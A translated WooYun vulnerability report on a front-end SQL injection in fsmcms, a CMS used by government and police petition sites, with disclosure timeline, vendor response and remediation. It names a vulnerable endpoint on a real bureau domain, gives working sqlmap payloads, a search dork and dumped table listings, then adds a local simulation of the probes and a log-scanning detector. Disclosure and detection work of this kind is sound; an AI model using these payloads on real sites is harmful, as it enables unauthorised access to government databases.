
Vulnerability summary (24 followers)

Defect ID: wooyun-2014-061675

Title: Front-end SQL injection in a CMS widely used by government sites (several public security bureau petition sites affected)

Vendor: fsmcms

Author: Haswell

Submitted: 2014-05-22 23:15

Fix time: 2014-08-20 23:16

Public disclosure: 2014-08-20 23:16

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure timeline:

2014-05-22: Details sent to the vendor, awaiting vendor action
2014-05-27: Vendor confirmed; details visible to the vendor only
2014-05-30: Details opened to third-party security partners
2014-07-21: Details opened to core white hats and domain experts
2014-07-31: Details opened to regular white hats
2014-08-10: Details opened to intern white hats
2014-08-20: Details opened to the public

Brief description:

One injection point in the front end, reachable without logging in; on most of the affected sites the database account is DBA.

Details:

fsmcms: a search for inurl:fsmcms turns up roughly 36,800 results.
Injection point:

/fsmcms/sites/main/select.jsp?select_value=


Both boolean-based blind and UNION query injection work.
Example, Baotou Public Security Bureau: btgaj.gov.cn/fsmcms/sites/main/select.jsp?select_value=FJ_QS

---
Place: GET
Parameter: select_value
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: select_value=FJ_QS' AND 2255=2255 AND 'Llbb'='Llbb
Type: UNION query
Title: Generic UNION query (NULL) - 29 columns
Payload: select_value=FJ_QS' UNION ALL SELECT CHR(113)||CHR(105)||CHR(114)||CHR(115)||CHR(113)||CHR(97)||CHR(65)||CHR(119)||CHR(113)||CHR(119)||CHR(77)||CHR(117)||CHR(111)||CHR(79)||CHR(82)||CHR(113)||CHR(117)||CHR(120)||CHR(114)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--
---
web application technology: JSP
back-end DBMS: Oracle
current user is DBA: True
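The two sqlmap findings above are easy to reason about with a small model. The following is an added example written for this page, not fsmcms code and not the report author's: it stands an in-memory SQLite table (with CHR() and a one-row DUAL shimmed in to mimic Oracle) in for the unknown schema behind select.jsp, builds the query the way a string-concatenating JSP would, runs the same boolean-based blind and UNION probes sqlmap used, and shows that binding the parameter makes both probes fail. The table and column names (site_select, label), the sample rows and the single-column result set are assumptions; the real query returns 29 columns, which is why the original payload pads with 28 NULLs.

```python
import secrets
import sqlite3
import string


def make_db():
    """In-memory stand-in for the Oracle schema behind select.jsp (constructed; real tables unknown)."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("CHR", 1, chr)             # Oracle CHR(n) equivalent
    conn.execute("CREATE TABLE dual (dummy TEXT)")   # Oracle's one-row DUAL table
    conn.execute("INSERT INTO dual VALUES ('X')")
    conn.execute("CREATE TABLE site_select (select_value TEXT, label TEXT)")
    conn.executemany(
        "INSERT INTO site_select VALUES (?, ?)",
        [("FJ_QS", "Petition sub-site"), ("MAIN", "Main site")],
    )
    return conn


def vulnerable_lookup(conn, select_value):
    """String-concatenated query: the shape that makes select_value injectable."""
    sql = "SELECT label FROM site_select WHERE select_value = '%s'" % select_value
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.Error:
        return []  # error swallowed: no DB message reaches the page, hence *blind* injection


def safe_lookup(conn, select_value):
    """Bound parameter: the whole attacker string is compared as data, never parsed as SQL."""
    sql = "SELECT label FROM site_select WHERE select_value = ?"
    return [row[0] for row in conn.execute(sql, (select_value,))]


def _rand_letters(n):
    return "".join(secrets.choice(string.ascii_letters) for _ in range(n))


def boolean_blind_probe(lookup, base_value):
    """sqlmap's 'AND boolean-based blind - WHERE or HAVING clause' check.

    A TRUE tautology must reproduce the baseline response and a FALSE one must
    change it; the trailing 'tag'='tag' re-balances the quote the payload opened.
    """
    tag = _rand_letters(4)
    n = secrets.randbelow(9000) + 1000
    baseline = lookup(base_value)
    true_resp = lookup(f"{base_value}' AND {n}={n} AND '{tag}'='{tag}")
    false_resp = lookup(f"{base_value}' AND {n}={n + 1} AND '{tag}'='{tag}")
    return bool(baseline) and baseline == true_resp and baseline != false_resp


def chr_chain(text):
    """Encode text as CHR(n)||CHR(n)||... so the UNION payload needs no further quotes."""
    return "||".join(f"CHR({ord(c)})" for c in text)


def union_probe(lookup, base_value, columns):
    """sqlmap's 'Generic UNION query (NULL)' check for a query returning `columns` columns.

    A random marker wrapped in fixed prefix/suffix is selected in the first column;
    finding it in the response proves the UNIONed row reached the page.
    """
    marker = "qirsq" + _rand_letters(10) + "quxrq"  # sqlmap-style boundary markers
    nulls = ",NULL" * (columns - 1)
    payload = f"{base_value}' UNION ALL SELECT {chr_chain(marker)}{nulls} FROM DUAL--"
    return marker in lookup(payload)


if __name__ == "__main__":
    conn = make_db()
    for name, fn in (("concatenated", vulnerable_lookup), ("parameterised", safe_lookup)):
        lookup = lambda v, fn=fn: fn(conn, v)
        print(f"{name:13} blind={boolean_blind_probe(lookup, 'FJ_QS')} "
              f"union={union_probe(lookup, 'FJ_QS', 1)}")
```

Decoding the CHR() chain in the original UNION payload gives qirsq + aAwqwMuoOR + quxrq: the fixed prefix and suffix are what sqlmap greps for in the response, the middle is the per-run random part. The swallowed exception in vulnerable_lookup is the detail that makes the bug blind rather than error-based; it does not make it any less exploitable.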


Database enumeration (schemas):

[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] FSM_CMS
[*] HITEKEP
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB


The P_USER table in FSM_CMS holds the user accounts, and the admin console logs in at fsmcms/adminindex.jsp.
Because this is a generic product I did not try to get a shell through the back end.

Proof:

Database: FSM_CMS
[173 tables]
+--------------------------------+
| CAMS_ITEM |
| CAMS_NEWS_HISTORY |
| KEBIAO |
| P_ACCESSLOG |
| P_ACCESSLOG_201211 |
| P_ACCESSLOG_201301 |
| P_ACCESSLOG_201302 |
| P_ACCESSLOG_201303 |
| P_ACCESSLOG_201304 |
| P_ACCESSLOG_201305 |
| P_ACCESSLOG_201306 |
| P_ACCESSLOG_201307 |
| P_ACCESSLOG_201308 |
| P_ACCESSLOG_201309 |
| P_ACCESSLOG_201310 |
| P_ACCESSLOG_201311 |
| P_ACCESSLOG_201312 |
| P_ACCESSLOG_201401 |
| P_ACCESSLOG_201402 |
| P_ACCESSLOG_201403 |
| P_ACCESSLOG_201404 |
| P_ACCESSLOG_201405 |
| P_ACCESS_DAY |
| P_ADCOLUMN |
| P_ADINFOCONTENT |
| P_ADPIC |
| P_ADTEMPLATE |
| P_ADWEB |
| P_ADWEBPUBLISH |
| P_AGENT |
| P_AGENTDEFAULTWEB |
| P_AGENTROLE |
| P_AGENTWEB |
| P_BACKUP |
| P_CALENDAR |
| P_CHILDWEB |
| P_COLLECTMAGAZINE |
| P_COLNAVIGATION |
| P_COLUMN |
| P_COLUMNPERMISSIONS |
| P_COLUMNTEMPLATE |
| P_COLUMNTOINFO |
| P_COLUMNVISIBLE |
| P_COLUMNWELCOMEINFO |
| P_CONTRIBUTE |
| P_CONTRIBUTE_COLUMN |
| P_CRITIC |
| P_CUSTOMFIELD |
| P_CUSTOMFIELD_VALUE |
| P_DEALDEPART |
| P_DEPT |
| P_DEPTDUTY |
| P_DEPTGROUP |
| P_DEPTGROUPLINK |
| P_DEPTNODEAGENT |
| P_DIR |
| P_DOC |
| P_DOWNLOAD |
| P_DUTY_ARRANGE |
| P_EMAIL |
| P_FILE |
| P_FILESIGN |
| P_FILESIGNRESULT |
| P_FLOW |
| P_GNUM |
| P_GROUP |
| P_HOTSPOT |
| P_INDEXTEMPLET |
| P_INFO |
| P_INFOBROWSE |
| P_INFOBROWSEDAY |
| P_INFOCOMMENT |
| P_INFOSEND |
| P_INFOSHARE |
| P_INFOSHAREAUTO |
| P_INFOSOURCE |
| P_INFOTAG |
| P_INFOTOINFO |
| P_INTEGRALDETAIL |
| P_INTERVIEW |
| P_INTERVIEW_PIC |
| P_INTERVIEW_QUESTION |
| P_IP |
| P_ISSUEMAGAZINE |
| P_JOB |
| P_KEYS |
| P_LEADERMAIL |
| P_LEADERMAIL1 |
| P_LINK |
| P_LOB_FILE |
| P_LOB_TEXT |
| P_LOGCATEGORY |
| P_LOGINFO |
| P_LOGINNUM |
| P_MAGASERIALCOL |
| P_MAGAZINE |
| P_MAGAZINECOLUMN |
| P_MAGAZINEINFO |
| P_MAIL |
| P_MAIL_ATTACH |
| P_MENU |
| P_MESSAGEBOARD |
| P_MESSAGE_TYPE |
| P_NAVIGATION |
| P_NODE |
| P_NODEAGENT |
| P_OPERATECODE |
| P_OTHERWEB |
| P_PERSONWEB |
| P_POR_MODULECONFIG |
| P_POR_MODULELAYOUT |
| P_POR_MODULES |
| P_POR_PERMISSION |
| P_POR_USER |
| P_PRIVATEADDRESS |
| P_PROGRAMTEMPLET |
| P_PUBLICADDRESS |
| P_PUBLISH_QUEUE |
| P_PV |
| P_QNERESULT |
| P_QUESTIONFIELD |
| P_QUESTIONS |
| P_QUESTIONTABLE |
| P_QUESTION_REPLY |
| P_RECIPIENT |
| P_REGMEMBER |
| P_RELEASEROLE |
| P_REMINDER |
| P_REMOTEHOST |
| P_REPLY |
| P_RESEARCH |
| P_RESOPTION |
| P_RESRESULT |
| P_RESUME |
| P_REVERTMB |
| P_ROLE |
| P_ROLEMENU |
| P_ROLEWEB |
| P_SHAREHOST |
| P_SITEACCESSLOG |
| P_SITETEMPLATE |
| P_STATIC_QUEUE |
| P_TABLE |
| P_TABLEFIELD |
| P_TABLEPROGRAM |
| P_TABOO |
| P_TEMP |
| P_TEMPDESIGN |
| P_TEMPINCLUDE |
| P_TEMPLET |
| P_TEMPWEB |
| P_TODO |
| P_TOPIC |
| P_TOPICQUESTIONS |
| P_USER |
| P_USERDEPT |
| P_USERGROUP |
| P_USERINTEGRAL |
| P_VIDEO |
| P_WEB |
| P_WEBCOPYRIGHT |
| P_WEBTITLE |
| P_WEIBO |
| P_WFCONFIG |
| P_WFHISTORY |
| P_WFINSTANCE |
| P_WORKFLOW |
| P_WORKFLOWDETAIL |
| P_WORKLOG |
| P_WORKPLAN |
| P_WORKREVIEW |
| STUDENT |
| SYS_SECURITY_TOKEN |
+--------------------------------+


Remediation:

Patch it: bind select_value as a query parameter instead of concatenating it into the SQL string, and run the application under an Oracle account without DBA privileges so that any future injection cannot reach the whole instance.

Copyright: credit Haswell@乌云 when reposting.
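Until the vendor fix lands, the probe traffic this report describes is easy to spot in web server access logs. The following is an added example, not from the original report or the vendor: a small log scanner that flags the payload features visible in the sqlmap output above (quote followed by a numeric tautology, UNION ALL SELECT, an Oracle CHR()||CHR() chain, FROM DUAL) on requests to select.jsp, and decodes the CHR() chain back to sqlmap's boundary marker. The log lines are constructed in Common Log Format, the rule names are my own, and the second percent-decoding pass is a choice made so a double-encoded payload does not slip past. It is a compensating detection only, not a substitute for binding the parameter.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample lines in Common Log Format; not real fsmcms traffic.
# Line 5 carries a double-percent-encoded copy of the blind probe.
SAMPLE_LOG = """\
203.0.113.5 - - [22/May/2014:23:10:01 +0800] "GET /fsmcms/sites/main/select.jsp?select_value=FJ_QS HTTP/1.1" 200 5120
203.0.113.5 - - [22/May/2014:23:10:02 +0800] "GET /fsmcms/sites/main/select.jsp?select_value=FJ_QS%27%20AND%202255%3D2255%20AND%20%27Llbb%27%3D%27Llbb HTTP/1.1" 200 5120
203.0.113.5 - - [22/May/2014:23:10:03 +0800] "GET /fsmcms/sites/main/select.jsp?select_value=FJ_QS%27%20UNION%20ALL%20SELECT%20CHR(113)%7C%7CCHR(105)%7C%7CCHR(114)%7C%7CCHR(115)%7C%7CCHR(113)%2CNULL%20FROM%20DUAL-- HTTP/1.1" 200 5200
198.51.100.9 - - [22/May/2014:23:11:00 +0800] "GET /fsmcms/sites/main/index.jsp HTTP/1.1" 200 8000
203.0.113.5 - - [22/May/2014:23:11:30 +0800] "GET /fsmcms/sites/main/select.jsp?select_value=FJ_QS%2527%2520AND%25201%253D1%2520AND%2520%2527a%2527%253D%2527a HTTP/1.1" 200 5120
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule keys on one feature of the payloads shown in the sqlmap output.
SIGNATURES = {
    "boolean_blind": re.compile(r"'\s*AND\s+(\d+)\s*=\s*\1\b", re.I),                 # ' AND 2255=2255
    "union_select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),              # UNION ALL SELECT
    "oracle_chr_chain": re.compile(r"CHR\(\d+\)(?:\s*\|\|\s*CHR\(\d+\))+", re.I),    # CHR(..)||CHR(..)
    "oracle_dual": re.compile(r"\bFROM\s+DUAL\b", re.I),                             # FROM DUAL
}


def decode_chr_chain(text):
    """Rebuild the literal a CHR(n)||CHR(n)... chain evaluates to (sqlmap's boundary marker)."""
    return "".join(chr(int(n)) for n in re.findall(r"CHR\((\d+)\)", text, re.I))


def analyse_line(line):
    """Return a finding for a select.jsp request whose select_value matches a rule, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if not url.path.endswith("/select.jsp"):
        return None
    value = parse_qs(url.query).get("select_value", [""])[0]  # parse_qs percent-decodes once
    value = unquote_plus(value)  # second pass: catches double-encoded payloads
    hits = [name for name, rx in SIGNATURES.items() if rx.search(value)]
    if not hits:
        return None
    finding = {"ip": m["ip"], "ts": m["ts"], "select_value": value, "hits": hits}
    if "oracle_chr_chain" in hits:
        finding["decoded_marker"] = decode_chr_chain(value)
    return finding


def scan(log_text):
    """Run analyse_line over every line and keep only the findings."""
    return [f for f in map(analyse_line, log_text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["hits"], f.get("decoded_marker", ""))
```

Point the scanner at the real access log (one line per call to analyse_line) and alert on any finding; the baseline request on line 1 and the unrelated index.jsp request produce nothing. Because boolean-blind enumeration needs hundreds of requests per extracted character, counting findings per source IP per minute is a stronger signal than any single hit.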


Vulnerability response

Vendor response:

Severity: High

Rank: 13

Confirmed: 2014-05-27 13:53

Vendor reply:

CNVD confirmed and reproduced the described situation.

Latest status:

None


Comments:

  1. 2014-05-22 23:41 | 橘子 ( Passer-by | Rank:0 vulns:3 | Um... just a shy high schooler. Tagging along with the master @Haswell...)

    Claiming a front-row seat~

  2. 2014-06-26 15:14 | 汪哥 ( Passer-by | Rank:28 vulns:6 )

    Leaving my name before this blows up

  3. 2014-10-25 23:43 | Coffee ( Regular white hat | Rank:144 vulns:15 | Corie, a student of RDFZ.)

    "Because this is a generic product I did not try to get a shell through the back end"